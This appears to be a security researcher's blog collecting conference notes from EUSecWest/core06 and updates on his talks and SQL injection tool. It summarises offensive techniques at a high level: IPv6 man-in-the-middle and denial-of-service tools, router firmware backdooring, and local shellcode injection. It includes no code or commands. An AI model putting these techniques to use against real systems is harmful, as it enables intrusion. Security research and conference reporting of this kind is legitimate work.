justinclarke.com

I just got a paper accepted at the upcoming EUSecWest conference in London on automated web application penetration techniques. Cool! Now I need to get my slide deck sorted out ...

The first annual EUSecWest conference (from the organisers of PacSec and CanSecWest) kicks off in London tomorrow. I'll be there, speaking on Tuesday, and blogging some detail about each of the talks. These are the talks that have been accepted:

• van Hauser THC / n.runs GmbH
  Attacking the IPv6 protocol suite
• Javier Burroni & Carlos Sarraute - Core Security Technologies
  Analyzing OS fingerprints using Neural Networks and Statistical Machinery
• Nguyen Anh Quynh - Keio University
  XEBEK: A Next Generation Honeypot Monitoring System
• Fred Raynal - EADS
  Malicious Crypto
• Cesar Cerrudo - Argeniss
  Windows Local Shellcode Injection
• Andrew Cushman - Microsoft
  Microsoft Security Fundamentals
• Shreeraj Shah - Net Square
  Advanced Web Hacking - Attacks & Defense
• Justin Clarke - Ernst & Young LLP
  Practical Automated Web Application Attack Techniques
• Andy Davis - IRM PLC
  ColdFusion Security
• Tim Hurman - Pentest Ltd.
  ARMed Combat: The Fight For Personal Security
• Raffael Marty - ArcSight
  A Visual Approach to Security Event Management
• Michael Boman - KPMG Singapore
  Network Security Monitoring: Theory and Practice
• Jim DeLeskie & Danny McPherson - Teleglobe, Arbor Networks
  Protecting the Infrastructure
• Andrea Barisani - Inverse Path
  Lessons in Open Source Security: The Tale of a 0-Day Incident

More details here tomorrow :-)

Here are my notes from day one of the first annual EUSecWest/core06 security conference in London:

van Hauser from The Hacker's Choice talked about IPv6 vulnerabilities, including the differences, and similarities of performing certain types of exploits in IPv4 and IPv6, and some of the new issues raised by the introduction of IPv6. The presentation can be downloaded from here.

Some of the interesting highlights from my point of view were:

• IPv6 is not in widespread use right now in Europe or the US (it is in Japan and South Korea).  A lot of the people using IPv6 (especially over IPv4) at the moment are Blackhats
• A lot of the IPv4 reconnaissance techniques (such as ping sweeping) are not possible on IPv6 due to the number of IP's in the space - DNS is going to become key in identifying systems
  • Once we can compromise a "public" server (i.e. one we can find through DNS) we can use IPv6 multicast to find systems on that subnet
  • OSPFv3 relies on IPSec.... so we'd better be running it, or use another routing protocol
• vh has written a toolset (library?) for testing IPv6, and created a whole host of tools as part of the IPv6 attack suite:
  • alive6 - for "alive" checking of hosts. If you are on the local subnet. Ping sweeping the Internet for live hosts is not going to be feasible in an IPv6 world
  • parasite6 - for Man-in-the-middle attacks, leveraging weaknesses in Neighbour Discovery protocol (the IPv6 replacement for ARP)
  • dos-new-ipv6 - for preventing people from joining the network by claiming all IPs are already taken
  • fake_router6 - for Man-in-the-middle attacks using Router Advertisements
  • smurf6 - local subnet DoS using multicast
  • rsmurf6 - remote DoS for broken Linux IPv6 implementation
  • redir6 - route implanting using "secure" ICMPv6 redirects
  • toobig6 - reduce client's MTU
• vh tested various IPv6 implementations (Windows XP SP2, Linux 2.6, OpenBSD, FreeBSD 5.3), and found that all of the implementations were vulnerable to one or more issues
• Source routing may make a comeback, as all of the OS's tested passed on source routed packets, and these can be disguised by putting a fragmentation header in front of the routing packet, hence passing routers.

The next talk was by Barnaby Jack (from eEye Digital Security) about exploiting embedded systems.  This one was pretty interesting, and he was using a standard D-Link DI-604 broadband router as the exploit target.  Here are some notes:

• A lot of embedded systems use ARM architectures, and real time OS's such as ThreadX
• By using a JTAG emulator, and with some soldering, you can hook up a debugger to the device and start debugging the firmware as it runs
  • Because of the watchdog timer, the device may need a patch to prevent the watchdog from resetting the device
  • Modifying firmware involves figuring out how it is encoded and checksummed by the vendor - from debugging the web server code
• The demo was pretty impressive
  • It used a LAN-side 0day bug in a function in the uPnP code for the router - the exploit removed the admin password, and enabled the external WAN side admin port
  • Uploaded modified firmware with a "payload" that modified every .exe file downloaded through the router (popped up a command prompt with "OWNED" on it)

Javier Burroni and Carlos Sarraute from CORE Security gave a quite interesting talk on using statistical methods and neural networks to more accurately determine operating system versions from the network.  They talked about a couple of different tools:

• An improved DCE-RPC endpoint mapper, which much more reliably determined what Windows version and service pack was running
• An OS detection tool using the nmap OS signature database, designed to reduce false positives, and "improbable" results that you can get with nmap
  • first neural network to determine whether it is a "relevant" OS or not (i.e. one we have exploits for)
• second neural network to determine what OS family the system is - i.e. Linux, Windows, OpenBSD, FreeBSD, NetBSD, Solaris
• neural networks for each OS family to determine what version is running.

Nguyen Anh Quynh from Keio University in Japan (he is involved with development of Xen) gave a talk on next generation honeypot technology using Xen.

He talked about the weaknesses with Sebek in a honeynet environment - specifically that there are several ways to detect that you are in a honeypot, from detecting the presence of Sebek, to detecting the traffic that it sends on the network.

He then talked about "Xebek", which uses Xen to run honeypot systems as virtual machines ("user domains") within Xen, with the Xebek server running on the "Domain 0" (host/first VM) on the machine.  Apparently this, patching the system calls in the kernel, and using shared memory to share data with the server will fix most of the weaknesses with Sebek.

There was a spirited discussion in the Q&A about how detectable this approach will be versus the approach of Sebek.  Quynh did note that they are not attempting to hide the fact that the system in running in Xen, on the assumption that enough production systems will be running Xen that it will not be suspicious.

Frederick Raynal from the EADS Corporate Research Centre talked about the (ab)use of crypto.  This included discussion of a number of scenarios where crypto, humans, and trust could be abused, such as:

• breaking the crypto (mis)used in the SuckIt rootkit versions 1 and 2 to take over a network of systems with SuckIt installed
• using the trust relations, and information stored in a user's directory to theorise the possibility of a SSH worm.  This included noting the use of existing sessions and other methods of capturing or leveraging existing access
• looked at methods/possibilities for preventing the analysis of a binary through the use of crypto, including differing situations over keys and decryption
• looked at scenarios for performing Man-in-the-Middle attacks against Skype.

Cesar Cerrudo from Argeniss talked about Windows local shellcode injection.  The technique he was demonstrating was based on the use of LPC named ports.  You can see these things using Process Explorer from SysInternals.  He went through the process of connecting to a process's LPC port (including some of the problems, like how to find the name of the port), create a shared memory section, and use the shared section to put shellcode into the process's memory space.  This also returns you a pointer to where the shellcode resides, making exploit even easier, more portable, and Windows version independant.

Cesar then went through and demonstrated his exploits for MS05-12 and MS05-40 that leverage this approach.  

Andrew Cushman from Microsoft came and talked about the work that MS is putting in on the security front over their products.  Andrew went through a lot of the efforts that are going into Vista, as well as an interesting talk about the Microsoft response to the WMF bug.

Today I am speaking at the EUSecWest/core06 security conference in London on "Practical Automated Web Application Attack Techniques". You can find my presentation here.

Also, here are the example files, parseLog.pl (which for some reason is not on the O'Reilly site), simpleScanner.pl, and extendedScanner.pl.

The second and last day of EUSecWest has been and gone. It turned out to be a fun experience, with a lot of valuable and interesting information shared by the speakers, and a lot of interesting folks met at the conferece. Here are my notes from the main speakers today (I haven't included the lightning talks or vendors because I was busy drinking beer by that stage...):

Shreeraj Shah from net-square talked about web application attacks and defences.  He introduced and demonstrated a number of tools he has written for the enumeration of information from the MSN Search engine, as well as some cool tools for web services testing and penetration, including:

• MSNPawn - discovery and enumeration of information about HTTP hosts (including discovering running hosts by the server IP address) from querying using the MSN Search web service
• MSNKnight - for building a profile about the site, by acting as a local proxy
• wsPawn - for footprinting web services
• wsKnight - for interacting with the web service using a WSDL file
• wsAudit - for performing attack fuzzing on web services

Justin Clarke (me) from Ernst & Young talked about automating web application assessment and exploitation.  The talk seemed to go down fairly well.  I demonstrated some of the tools that were written for Network Security Tools, as well as one tool (SQLBrute) that is available from my site.  I also completely forgot to demonstrate one small tool (IEnterceptor)... whoops.

Andy Davis from Information Risk Management talked about ColdFusion security.  They have been doing a lot of research on version 7, 6.1 and 6.0 of CF, and talked about some of the issues (especially in the admin interface) that can be leveraged for nefarious purposes.  Some of the issues they found haven't been fixed yet (in the services etc that ship with CF), so we can look forward to more once Adobe release the fixes.

Tim Hurman from Pentest Limited talked about the security over personal ARM devices, such as common PDAs.  This covered some similar ground to Barnaby Jack's talk yesterday, with the differences that Tim was using JTAG to debug IPAQ's and the like, and went on to demo an "always on" vulnerability in (I think) the vCal parsing via Bluetooth OBEX file transfer on a (I think) HP 5xxx IPAQ running Windows Mobile 2003.  The exploit was a nice Window showing "0wn3d".  Tim mentioned how this type of issue could be used to formulate an "airborne virus" that you could pick up from an infected device, which would attack your desktop PC when in the sync cradle, and attack other mobile devices via Bluetooth when not attached.  Nice :-)

Raffael Marty from ArcSight talked about visual security event analysis using the Afterglow toolset.  Raff went through a number of visualisation examples, and these did look very useful for this type of application.  I will definitely be having a look into these sometime soon.

Michael Boman from KPMG Singapore talked about network security monitoring theory and practice, and also the SGUIL network monitoring console.  This looked pretty useful, and a possible alternative to some of the (expensive) commercial consoles that are becoming more available.

Jim DeLeskie from Teleglobe & Danny McPherson from Arbor Networks, talked about securing the infrastructure from the point of view of the service provider.  This was pretty interesting to me as well, especially when talking about the provider techniques and limitations when responding (or not) to DDOS attacks.

Andrea Barisani from Inverse Path (and the Gentoo team) talked about the Gentoo rsync server compromise that happened in December 2003 (of a core portage rsync server), the detection of the compromise, analysis of what happened (including identification of the flaw in rsync), and the coordination of working with the rsync developers in fixing the flaw.  Very informative.

Just to note that the slide decks from the EuSecWest/core06 conference earlier this year are now available. You can obtain them from the EuSecWest site. My slides are not currently up there, although they should be soon. In the mean time, my slides and examples are available on my site.

You can also refer back to my blogged coverage of Day 1 and Day 2 of the conference on this site. Enjoy!

I've just got back from Brussels, after having spoken at the SANS Community Night last night on "Practical Automated Web Application Attack Techniques". You should now be able to download the slidedeck, as well as the tools from Network Security Tools that I demonstrated - parseLog.pl (which for some reason is not on the O'Reilly site), simpleScanner.pl, and extendedScanner.pl.

You can also find SQLBrute, as well as my page showing an example of using SQLBrute (which is what I demoed) as well. Enjoy!

I got an email this morning (and a comment on an IM conversation a week ago) that has continued to remind me that I've been neglecting this blog. So I thought I'd pen a quick update to let everyone know whats going on and coming up.

First of all, I got my turbo talk to Blackhat USA in Las Vegas accepted, so I'll be speaking there again for the first time since 2004. The paper is called "SQL Injection Worms for Fun and Profit", and appears to be even more timely than I expected when submitting it considering what is still an ongoing problem. I'll be in Vegas for both Blackhat and Defcon if anyone wants to plan a catch up.

On other news, I've made little progress on rewriting SQLBrute in .NET due to a lack of time. I am, however, going to release SQLBrute 1.1 in Python in the not too distant future - I'm adding Sybase support, and cleaning up a few of the routines. Also, check out the port of Microsoft's AntiXSS library to Java - you can check it out on the GDS Tools page.

Thats all for now - more news and happenings soon!

As some of you may be aware, I used to work for the Ernst & Young Advanced Security Center in New York (and in Houston before that). Having a quick look at the speakers list for Blackhat in Las Vegas as they are confirmed it amused me that so many of the old E&Y ASC crew are represented in the speakers list:

• Nitesh Dhanjani (although I don't think you could call Nitesh an alumni anymore... here is a link to his blog
• Brian Holyfield, who is also at Gotham Digital Science
• Nate McFeters - you can find his blog here
• Billy Rios - his blog is here
• Kevin Stadmeyer
• And of course, me